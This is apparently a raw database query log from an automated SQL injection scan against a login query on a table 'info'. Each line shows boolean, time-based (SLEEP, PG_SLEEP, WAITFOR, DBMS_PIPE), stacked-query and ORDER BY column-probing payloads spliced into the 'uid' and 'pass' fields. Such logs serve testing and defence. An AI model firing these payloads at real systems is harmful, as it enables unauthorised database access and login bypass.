Sat 18 Jul 2020 10:08:39 AM IST: SELECT * FROM info WHERE uid="1) AND 9136=4341 AND (8158=8158" AND pass=1
Sat 18 Jul 2020 10:08:39 AM IST: SELECT * FROM info WHERE uid="1 AND 4140=9240" AND pass=1
Sat 18 Jul 2020 10:08:39 AM IST: SELECT * FROM info WHERE uid="1 AND 9415=5109-- bVtU" AND pass=1
Sat 18 Jul 2020 10:08:39 AM IST: SELECT * FROM info WHERE uid="1') AND 9557=7216 AND ('xiyh'='xiyh" AND pass=1
Sat 18 Jul 2020 10:08:39 AM IST: SELECT * FROM info WHERE uid="1' AND 6386=2969 AND 'lcKP'='lcKP" AND pass=1
Sat 18 Jul 2020 10:08:40 AM IST: SELECT * FROM info WHERE uid="1) AND (SELECT 5836 FROM (SELECT(SLEEP(5)))nfxC) AND (9286=9286" AND pass=1
Sat 18 Jul 2020 10:08:40 AM IST: SELECT * FROM info WHERE uid="1 AND (SELECT 5836 FROM (SELECT(SLEEP(5)))nfxC)" AND pass=1
Sat 18 Jul 2020 10:08:40 AM IST: SELECT * FROM info WHERE uid="1 AND (SELECT 5836 FROM (SELECT(SLEEP(5)))nfxC)-- jcOn" AND pass=1
Sat 18 Jul 2020 10:08:40 AM IST: SELECT * FROM info WHERE uid="1') AND (SELECT 5836 FROM (SELECT(SLEEP(5)))nfxC) AND ('vycI'='vycI" AND pass=1
Sat 18 Jul 2020 10:08:41 AM IST: SELECT * FROM info WHERE uid="1' AND (SELECT 5836 FROM (SELECT(SLEEP(5)))nfxC) AND 'YISJ'='YISJ" AND pass=1
Sat 18 Jul 2020 10:08:41 AM IST: SELECT * FROM info WHERE uid="1) AND 3285=(SELECT 3285 FROM PG_SLEEP(5)) AND (6399=6399" AND pass=1
Sat 18 Jul 2020 10:08:41 AM IST: SELECT * FROM info WHERE uid="1 AND 3285=(SELECT 3285 FROM PG_SLEEP(5))" AND pass=1
Sat 18 Jul 2020 10:08:41 AM IST: SELECT * FROM info WHERE uid="1 AND 3285=(SELECT 3285 FROM PG_SLEEP(5))-- lxtV" AND pass=1
Sat 18 Jul 2020 10:08:41 AM IST: SELECT * FROM info WHERE uid="1') AND 3285=(SELECT 3285 FROM PG_SLEEP(5)) AND ('qhaK'='qhaK" AND pass=1
Sat 18 Jul 2020 10:08:41 AM IST: SELECT * FROM info WHERE uid="1' AND 3285=(SELECT 3285 FROM PG_SLEEP(5)) AND 'ZWxP'='ZWxP" AND pass=1
Sat 18 Jul 2020 10:08:41 AM IST: SELECT * FROM info WHERE uid="1) WAITFOR DELAY '0:0:5' AND (7265=7265" AND pass=1
Sat 18 Jul 2020 10:08:41 AM IST: SELECT * FROM info WHERE uid="1') WAITFOR DELAY '0:0:5' AND ('cdqc'='cdqc" AND pass=1
Sat 18 Jul 2020 10:08:41 AM IST: SELECT * FROM info WHERE uid="1' WAITFOR DELAY '0:0:5' AND 'dEJw'='dEJw" AND pass=1
Sat 18 Jul 2020 10:08:41 AM IST: SELECT * FROM info WHERE uid="1) AND 4837=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(66)||CHR(66)||CHR(110),5) AND (9984=9984" AND pass=1
Sat 18 Jul 2020 10:08:41 AM IST: SELECT * FROM info WHERE uid="1 AND 4837=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(66)||CHR(66)||CHR(110),5)" AND pass=1
Sat 18 Jul 2020 10:08:41 AM IST: SELECT * FROM info WHERE uid="1 AND 4837=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(66)||CHR(66)||CHR(110),5)-- HCgE" AND pass=1
Sat 18 Jul 2020 10:08:41 AM IST: SELECT * FROM info WHERE uid="1') AND 4837=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(66)||CHR(66)||CHR(110),5) AND ('AGqt'='AGqt" AND pass=1
Sat 18 Jul 2020 10:08:41 AM IST: SELECT * FROM info WHERE uid="1' AND 4837=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(66)||CHR(66)||CHR(110),5) AND 'iUZC'='iUZC" AND pass=1
Sat 18 Jul 2020 10:08:41 AM IST: SELECT * FROM info WHERE uid="1) ORDER BY 1-- iyOP" AND pass=1
Sat 18 Jul 2020 10:08:41 AM IST: SELECT * FROM info WHERE uid="1) ORDER BY 8523-- UlST" AND pass=1
Sat 18 Jul 2020 10:08:41 AM IST: SELECT * FROM info WHERE uid="1 ORDER BY 1-- NzcM" AND pass=1
Sat 18 Jul 2020 10:08:41 AM IST: SELECT * FROM info WHERE uid="1 ORDER BY 3179-- caAx" AND pass=1
Sat 18 Jul 2020 10:08:41 AM IST: SELECT * FROM info WHERE uid="1 ORDER BY 1-- KsHX" AND pass=1
Sat 18 Jul 2020 10:08:41 AM IST: SELECT * FROM info WHERE uid="1 ORDER BY 8124-- BpFN" AND pass=1
Sat 18 Jul 2020 10:08:41 AM IST: SELECT * FROM info WHERE uid="1') ORDER BY 1-- TdeA" AND pass=1
Sat 18 Jul 2020 10:08:41 AM IST: SELECT * FROM info WHERE uid="1') ORDER BY 2758-- xXOV" AND pass=1
Sat 18 Jul 2020 10:08:41 AM IST: SELECT * FROM info WHERE uid="1' ORDER BY 1-- pwEG" AND pass=1
Sat 18 Jul 2020 10:08:41 AM IST: SELECT * FROM info WHERE uid="1' ORDER BY 8251-- qfHX" AND pass=1
Sat 18 Jul 2020 10:08:41 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1) AND 4477=8792 AND (8190=8190
Sat 18 Jul 2020 10:08:41 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 AND 3329=8876
Sat 18 Jul 2020 10:08:41 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 AND 8446=9883-- qwXE
Sat 18 Jul 2020 10:08:42 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1') AND 2873=1508 AND ('YoPc'='YoPc
Sat 18 Jul 2020 10:08:42 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1' AND 7204=5614 AND 'uHAD'='uHAD
Sat 18 Jul 2020 10:08:42 AM IST: SELECT * FROM info WHERE uid="1" AND pass=(SELECT (CASE WHEN (9343=4206) THEN 1 ELSE (SELECT 4206 UNION SELECT 5554) END))
Sat 18 Jul 2020 10:08:43 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(84)||CHR(68)||CHR(114),5) FROM DUAL--
Sat 18 Jul 2020 10:08:43 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(84)||CHR(68)||CHR(114),5) FROM DUAL--
Sat 18 Jul 2020 10:08:43 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(84)||CHR(68)||CHR(114),5) FROM DUAL--
Sat 18 Jul 2020 10:08:43 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(84)||CHR(68)||CHR(114),5) FROM DUAL--
Sat 18 Jul 2020 10:08:43 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1) AND (SELECT 6821 FROM (SELECT(SLEEP(5)))RfFM) AND (5901=5901
Sat 18 Jul 2020 10:08:43 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 AND (SELECT 6821 FROM (SELECT(SLEEP(5)))RfFM)
Sat 18 Jul 2020 10:08:43 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 AND (SELECT 6821 FROM (SELECT(SLEEP(5)))RfFM)-- MLaU
Sat 18 Jul 2020 10:08:43 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1') AND (SELECT 6821 FROM (SELECT(SLEEP(5)))RfFM) AND ('WcUg'='WcUg
Sat 18 Jul 2020 10:08:43 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1' AND (SELECT 6821 FROM (SELECT(SLEEP(5)))RfFM) AND 'vNac'='vNac
Sat 18 Jul 2020 10:08:43 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1) AND 6078=(SELECT 6078 FROM PG_SLEEP(5)) AND (2291=2291
Sat 18 Jul 2020 10:08:43 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 AND 6078=(SELECT 6078 FROM PG_SLEEP(5))
Sat 18 Jul 2020 10:08:43 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 AND 6078=(SELECT 6078 FROM PG_SLEEP(5))-- gALd
Sat 18 Jul 2020 10:08:43 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1') AND 6078=(SELECT 6078 FROM PG_SLEEP(5)) AND ('FQWr'='FQWr
Sat 18 Jul 2020 10:08:43 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1' AND 6078=(SELECT 6078 FROM PG_SLEEP(5)) AND 'rPjS'='rPjS
Sat 18 Jul 2020 10:08:43 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1) WAITFOR DELAY '0:0:5' AND (2428=2428
Sat 18 Jul 2020 10:08:43 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1') WAITFOR DELAY '0:0:5' AND ('FCak'='FCak
Sat 18 Jul 2020 10:08:43 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1' WAITFOR DELAY '0:0:5' AND 'jddT'='jddT
Sat 18 Jul 2020 10:08:43 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1) AND 1882=DBMS_PIPE.RECEIVE_MESSAGE(CHR(120)||CHR(112)||CHR(70)||CHR(71),5) AND (6756=6756
Sat 18 Jul 2020 10:08:43 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 AND 1882=DBMS_PIPE.RECEIVE_MESSAGE(CHR(120)||CHR(112)||CHR(70)||CHR(71),5)
Sat 18 Jul 2020 10:08:43 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 AND 1882=DBMS_PIPE.RECEIVE_MESSAGE(CHR(120)||CHR(112)||CHR(70)||CHR(71),5)-- GHTJ
Sat 18 Jul 2020 10:08:43 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1') AND 1882=DBMS_PIPE.RECEIVE_MESSAGE(CHR(120)||CHR(112)||CHR(70)||CHR(71),5) AND ('NUzA'='NUzA
Sat 18 Jul 2020 10:08:43 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1' AND 1882=DBMS_PIPE.RECEIVE_MESSAGE(CHR(120)||CHR(112)||CHR(70)||CHR(71),5) AND 'cyBR'='cyBR
Sat 18 Jul 2020 10:08:43 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1) ORDER BY 1-- nNeZ
Sat 18 Jul 2020 10:08:43 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1) ORDER BY 1719-- XTze
Sat 18 Jul 2020 10:08:43 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 ORDER BY 1-- dvwo
Sat 18 Jul 2020 10:08:43 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 ORDER BY 3295-- zWGM
Sat 18 Jul 2020 10:08:43 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 ORDER BY 1-- dVKa
Sat 18 Jul 2020 10:08:43 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 ORDER BY 9847-- nJbw
Sat 18 Jul 2020 10:08:43 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1') ORDER BY 1-- IlPG
Sat 18 Jul 2020 10:08:44 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1') ORDER BY 8746-- iKVj
Sat 18 Jul 2020 10:08:44 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1' ORDER BY 1-- thwa
Sat 18 Jul 2020 10:08:44 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1' ORDER BY 1424-- wxkc
Sat 18 Jul 2020 10:08:50 AM IST: SELECT * FROM info WHERE uid="1) AND 3319=6050 AND (3377=3377" AND pass=1
Sat 18 Jul 2020 10:08:50 AM IST: SELECT * FROM info WHERE uid="1 AND 3382=1576" AND pass=1
Sat 18 Jul 2020 10:08:50 AM IST: SELECT * FROM info WHERE uid="1 AND 7982=6233-- pvsU" AND pass=1
Sat 18 Jul 2020 10:08:50 AM IST: SELECT * FROM info WHERE uid="1') AND 7962=1765 AND ('gMiC'='gMiC" AND pass=1
Sat 18 Jul 2020 10:08:50 AM IST: SELECT * FROM info WHERE uid="1' AND 6728=7056 AND 'Dbma'='Dbma" AND pass=1
Sat 18 Jul 2020 10:08:50 AM IST: SELECT * FROM info WHERE uid="(SELECT (CASE WHEN (1958=7764) THEN 1 ELSE (SELECT 7764 UNION SELECT 4457) END))" AND pass=1
Sat 18 Jul 2020 10:08:51 AM IST: SELECT * FROM info WHERE uid="1);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(84)||CHR(98)||CHR(82),5) FROM DUAL--" AND pass=1
Sat 18 Jul 2020 10:08:51 AM IST: SELECT * FROM info WHERE uid="1;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(84)||CHR(98)||CHR(82),5) FROM DUAL--" AND pass=1
Sat 18 Jul 2020 10:08:51 AM IST: SELECT * FROM info WHERE uid="1');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(84)||CHR(98)||CHR(82),5) FROM DUAL--" AND pass=1
Sat 18 Jul 2020 10:08:51 AM IST: SELECT * FROM info WHERE uid="1';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(84)||CHR(98)||CHR(82),5) FROM DUAL--" AND pass=1
Sat 18 Jul 2020 10:08:51 AM IST: SELECT * FROM info WHERE uid="1) AND (SELECT 6427 FROM (SELECT(SLEEP(5)))cfDC) AND (9424=9424" AND pass=1
Sat 18 Jul 2020 10:08:51 AM IST: SELECT * FROM info WHERE uid="1 AND (SELECT 6427 FROM (SELECT(SLEEP(5)))cfDC)" AND pass=1
Sat 18 Jul 2020 10:08:51 AM IST: SELECT * FROM info WHERE uid="1 AND (SELECT 6427 FROM (SELECT(SLEEP(5)))cfDC)-- ClAl" AND pass=1
Sat 18 Jul 2020 10:08:51 AM IST: SELECT * FROM info WHERE uid="1') AND (SELECT 6427 FROM (SELECT(SLEEP(5)))cfDC) AND ('rNkr'='rNkr" AND pass=1
Sat 18 Jul 2020 10:08:52 AM IST: SELECT * FROM info WHERE uid="1' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))cfDC) AND 'fCyd'='fCyd" AND pass=1
Sat 18 Jul 2020 10:08:52 AM IST: SELECT * FROM info WHERE uid="1) AND 4891=(SELECT 4891 FROM PG_SLEEP(5)) AND (3497=3497" AND pass=1
Sat 18 Jul 2020 10:08:52 AM IST: SELECT * FROM info WHERE uid="1 AND 4891=(SELECT 4891 FROM PG_SLEEP(5))" AND pass=1
Sat 18 Jul 2020 10:08:52 AM IST: SELECT * FROM info WHERE uid="1 AND 4891=(SELECT 4891 FROM PG_SLEEP(5))-- JACy" AND pass=1
Sat 18 Jul 2020 10:08:52 AM IST: SELECT * FROM info WHERE uid="1') AND 4891=(SELECT 4891 FROM PG_SLEEP(5)) AND ('pJRg'='pJRg" AND pass=1
Sat 18 Jul 2020 10:08:52 AM IST: SELECT * FROM info WHERE uid="1' AND 4891=(SELECT 4891 FROM PG_SLEEP(5)) AND 'NJVK'='NJVK" AND pass=1
Sat 18 Jul 2020 10:08:52 AM IST: SELECT * FROM info WHERE uid="1) WAITFOR DELAY '0:0:5' AND (3533=3533" AND pass=1
Sat 18 Jul 2020 10:08:52 AM IST: SELECT * FROM info WHERE uid="1') WAITFOR DELAY '0:0:5' AND ('rGvO'='rGvO" AND pass=1
Sat 18 Jul 2020 10:08:52 AM IST: SELECT * FROM info WHERE uid="1' WAITFOR DELAY '0:0:5' AND 'Epak'='Epak" AND pass=1
Sat 18 Jul 2020 10:08:52 AM IST: SELECT * FROM info WHERE uid="1) AND 6064=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(112)||CHR(76)||CHR(70),5) AND (4554=4554" AND pass=1
Sat 18 Jul 2020 10:08:52 AM IST: SELECT * FROM info WHERE uid="1 AND 6064=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(112)||CHR(76)||CHR(70),5)" AND pass=1
Sat 18 Jul 2020 10:08:52 AM IST: SELECT * FROM info WHERE uid="1 AND 6064=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(112)||CHR(76)||CHR(70),5)-- SwFh" AND pass=1
Sat 18 Jul 2020 10:08:52 AM IST: SELECT * FROM info WHERE uid="1') AND 6064=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(112)||CHR(76)||CHR(70),5) AND ('qInG'='qInG" AND pass=1
Sat 18 Jul 2020 10:08:52 AM IST: SELECT * FROM info WHERE uid="1' AND 6064=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(112)||CHR(76)||CHR(70),5) AND 'QLQv'='QLQv" AND pass=1
Sat 18 Jul 2020 10:08:52 AM IST: SELECT * FROM info WHERE uid="1) ORDER BY 1-- bgJh" AND pass=1
Sat 18 Jul 2020 10:08:52 AM IST: SELECT * FROM info WHERE uid="1) ORDER BY 7246-- ThWc" AND pass=1
Sat 18 Jul 2020 10:08:52 AM IST: SELECT * FROM info WHERE uid="1 ORDER BY 1-- tNJY" AND pass=1
Sat 18 Jul 2020 10:08:52 AM IST: SELECT * FROM info WHERE uid="1 ORDER BY 9665-- NYrl" AND pass=1
Sat 18 Jul 2020 10:08:52 AM IST: SELECT * FROM info WHERE uid="1 ORDER BY 1-- YPif" AND pass=1
Sat 18 Jul 2020 10:08:52 AM IST: SELECT * FROM info WHERE uid="1 ORDER BY 2204-- sZOn" AND pass=1
Sat 18 Jul 2020 10:08:52 AM IST: SELECT * FROM info WHERE uid="1') ORDER BY 1-- ffwX" AND pass=1
Sat 18 Jul 2020 10:08:52 AM IST: SELECT * FROM info WHERE uid="1') ORDER BY 5225-- HYml" AND pass=1
Sat 18 Jul 2020 10:08:52 AM IST: SELECT * FROM info WHERE uid="1' ORDER BY 1-- XAHt" AND pass=1
Sat 18 Jul 2020 10:08:52 AM IST: SELECT * FROM info WHERE uid="1' ORDER BY 6538-- EWZX" AND pass=1
Sat 18 Jul 2020 10:08:52 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1) AND 8522=4321 AND (7827=7827
Sat 18 Jul 2020 10:08:52 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 AND 1087=4870
Sat 18 Jul 2020 10:08:52 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 AND 1148=5407-- OvxC
Sat 18 Jul 2020 10:08:53 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1') AND 4473=9838 AND ('LNOS'='LNOS
Sat 18 Jul 2020 10:08:53 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1' AND 4135=6284 AND 'cYUd'='cYUd
Sat 18 Jul 2020 10:08:53 AM IST: SELECT * FROM info WHERE uid="1" AND pass=(SELECT (CASE WHEN (1249=6017) THEN 1 ELSE (SELECT 6017 UNION SELECT 4448) END))
Sat 18 Jul 2020 10:08:54 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(79)||CHR(80)||CHR(90)||CHR(121),5) FROM DUAL--
Sat 18 Jul 2020 10:08:54 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(79)||CHR(80)||CHR(90)||CHR(121),5) FROM DUAL--
Sat 18 Jul 2020 10:08:54 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(79)||CHR(80)||CHR(90)||CHR(121),5) FROM DUAL--
Sat 18 Jul 2020 10:08:54 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(79)||CHR(80)||CHR(90)||CHR(121),5) FROM DUAL--
Sat 18 Jul 2020 10:08:54 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1) AND (SELECT 1891 FROM (SELECT(SLEEP(5)))nhuh) AND (4554=4554
Sat 18 Jul 2020 10:08:54 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 AND (SELECT 1891 FROM (SELECT(SLEEP(5)))nhuh)
Sat 18 Jul 2020 10:08:54 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 AND (SELECT 1891 FROM (SELECT(SLEEP(5)))nhuh)-- ZBfA
Sat 18 Jul 2020 10:08:54 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1') AND (SELECT 1891 FROM (SELECT(SLEEP(5)))nhuh) AND ('LUND'='LUND
Sat 18 Jul 2020 10:08:54 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1' AND (SELECT 1891 FROM (SELECT(SLEEP(5)))nhuh) AND 'akdW'='akdW
Sat 18 Jul 2020 10:08:54 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1) AND 1709=(SELECT 1709 FROM PG_SLEEP(5)) AND (6288=6288
Sat 18 Jul 2020 10:08:54 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 AND 1709=(SELECT 1709 FROM PG_SLEEP(5))
Sat 18 Jul 2020 10:08:54 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 AND 1709=(SELECT 1709 FROM PG_SLEEP(5))-- VdpC
Sat 18 Jul 2020 10:08:54 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1') AND 1709=(SELECT 1709 FROM PG_SLEEP(5)) AND ('nibk'='nibk
Sat 18 Jul 2020 10:08:54 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1' AND 1709=(SELECT 1709 FROM PG_SLEEP(5)) AND 'KfjR'='KfjR
Sat 18 Jul 2020 10:08:54 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1) WAITFOR DELAY '0:0:5' AND (6870=6870
Sat 18 Jul 2020 10:08:54 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1') WAITFOR DELAY '0:0:5' AND ('foqi'='foqi
Sat 18 Jul 2020 10:08:54 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1' WAITFOR DELAY '0:0:5' AND 'RSVJ'='RSVJ
Sat 18 Jul 2020 10:08:54 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1) AND 5657=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(67)||CHR(76)||CHR(100),5) AND (8518=8518
Sat 18 Jul 2020 10:08:54 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 AND 5657=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(67)||CHR(76)||CHR(100),5)
Sat 18 Jul 2020 10:08:54 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 AND 5657=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(67)||CHR(76)||CHR(100),5)-- fZGP
Sat 18 Jul 2020 10:08:54 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1') AND 5657=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(67)||CHR(76)||CHR(100),5) AND ('EFSQ'='EFSQ
Sat 18 Jul 2020 10:08:54 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1' AND 5657=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(67)||CHR(76)||CHR(100),5) AND 'laxU'='laxU
Sat 18 Jul 2020 10:08:54 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1) ORDER BY 1-- OxqZ
Sat 18 Jul 2020 10:08:54 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1) ORDER BY 7438-- VKsg
Sat 18 Jul 2020 10:08:54 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 ORDER BY 1-- WMbF
Sat 18 Jul 2020 10:08:54 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 ORDER BY 9531-- OSJe
Sat 18 Jul 2020 10:08:54 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 ORDER BY 1-- UnZo
Sat 18 Jul 2020 10:08:54 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 ORDER BY 4219-- Euao
Sat 18 Jul 2020 10:08:54 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1') ORDER BY 1-- oOgt
Sat 18 Jul 2020 10:08:55 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1') ORDER BY 3473-- WGpc
Sat 18 Jul 2020 10:08:55 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1' ORDER BY 1-- WYkA
Sat 18 Jul 2020 10:08:55 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1' ORDER BY 9482-- JqFh
Sat 18 Jul 2020 10:09:00 AM IST: SELECT * FROM info WHERE uid="1) AND 8386=4679 AND (2321=2321" AND pass=1
Sat 18 Jul 2020 10:09:00 AM IST: SELECT * FROM info WHERE uid="1 AND 4608=8679" AND pass=1
Sat 18 Jul 2020 10:09:00 AM IST: SELECT * FROM info WHERE uid="1 AND 9304=6172-- pTxO" AND pass=1
Sat 18 Jul 2020 10:09:00 AM IST: SELECT * FROM info WHERE uid="1') AND 9585=3442 AND ('vCDS'='vCDS" AND pass=1
Sat 18 Jul 2020 10:09:00 AM IST: SELECT * FROM info WHERE uid="1' AND 9668=1428 AND 'wmgq'='wmgq" AND pass=1
Sat 18 Jul 2020 10:09:00 AM IST: SELECT * FROM info WHERE uid="(SELECT (CASE WHEN (4848=3833) THEN 1 ELSE (SELECT 3833 UNION SELECT 9851) END))" AND pass=1
Sat 18 Jul 2020 10:09:01 AM IST: SELECT * FROM info WHERE uid="1;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(72)||CHR(120)||CHR(119),5) FROM DUAL--" AND pass=1
Sat 18 Jul 2020 10:09:01 AM IST: SELECT * FROM info WHERE uid="1');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(72)||CHR(120)||CHR(119),5) FROM DUAL--" AND pass=1
Sat 18 Jul 2020 10:09:01 AM IST: SELECT * FROM info WHERE uid="1';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(72)||CHR(120)||CHR(119),5) FROM DUAL--" AND pass=1
Sat 18 Jul 2020 10:09:01 AM IST: SELECT * FROM info WHERE uid="1) AND (SELECT 4518 FROM (SELECT(SLEEP(5)))UUwt) AND (9149=9149" AND pass=1
Sat 18 Jul 2020 10:09:01 AM IST: SELECT * FROM info WHERE uid="1 AND (SELECT 4518 FROM (SELECT(SLEEP(5)))UUwt)" AND pass=1
Sat 18 Jul 2020 10:09:01 AM IST: SELECT * FROM info WHERE uid="1 AND (SELECT 4518 FROM (SELECT(SLEEP(5)))UUwt)-- Iyay" AND pass=1
Sat 18 Jul 2020 10:09:02 AM IST: SELECT * FROM info WHERE uid="1') AND (SELECT 4518 FROM (SELECT(SLEEP(5)))UUwt) AND ('ZSLI'='ZSLI" AND pass=1
Sat 18 Jul 2020 10:09:02 AM IST: SELECT * FROM info WHERE uid="1' AND (SELECT 4518 FROM (SELECT(SLEEP(5)))UUwt) AND 'HthB'='HthB" AND pass=1
Sat 18 Jul 2020 10:09:02 AM IST: SELECT * FROM info WHERE uid="1) AND 4114=(SELECT 4114 FROM PG_SLEEP(5)) AND (9408=9408" AND pass=1
Sat 18 Jul 2020 10:09:02 AM IST: SELECT * FROM info WHERE uid="1 AND 4114=(SELECT 4114 FROM PG_SLEEP(5))" AND pass=1
Sat 18 Jul 2020 10:09:02 AM IST: SELECT * FROM info WHERE uid="1 AND 4114=(SELECT 4114 FROM PG_SLEEP(5))-- AYRI" AND pass=1
Sat 18 Jul 2020 10:09:02 AM IST: SELECT * FROM info WHERE uid="1') AND 4114=(SELECT 4114 FROM PG_SLEEP(5)) AND ('hcwe'='hcwe" AND pass=1
Sat 18 Jul 2020 10:09:02 AM IST: SELECT * FROM info WHERE uid="1' AND 4114=(SELECT 4114 FROM PG_SLEEP(5)) AND 'LvrM'='LvrM" AND pass=1
Sat 18 Jul 2020 10:09:02 AM IST: SELECT * FROM info WHERE uid="1) WAITFOR DELAY '0:0:5' AND (6529=6529" AND pass=1
Sat 18 Jul 2020 10:09:02 AM IST: SELECT * FROM info WHERE uid="1') WAITFOR DELAY '0:0:5' AND ('SMqg'='SMqg" AND pass=1
Sat 18 Jul 2020 10:09:02 AM IST: SELECT * FROM info WHERE uid="1' WAITFOR DELAY '0:0:5' AND 'jFCb'='jFCb" AND pass=1
Sat 18 Jul 2020 10:09:02 AM IST: SELECT * FROM info WHERE uid="1) AND 7519=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(109)||CHR(121)||CHR(121),5) AND (9575=9575" AND pass=1
Sat 18 Jul 2020 10:09:02 AM IST: SELECT * FROM info WHERE uid="1 AND 7519=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(109)||CHR(121)||CHR(121),5)" AND pass=1
Sat 18 Jul 2020 10:09:02 AM IST: SELECT * FROM info WHERE uid="1 AND 7519=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(109)||CHR(121)||CHR(121),5)-- wkfx" AND pass=1
Sat 18 Jul 2020 10:09:02 AM IST: SELECT * FROM info WHERE uid="1') AND 7519=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(109)||CHR(121)||CHR(121),5) AND ('AmIv'='AmIv" AND pass=1
Sat 18 Jul 2020 10:09:02 AM IST: SELECT * FROM info WHERE uid="1' AND 7519=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(109)||CHR(121)||CHR(121),5) AND 'bTVK'='bTVK" AND pass=1
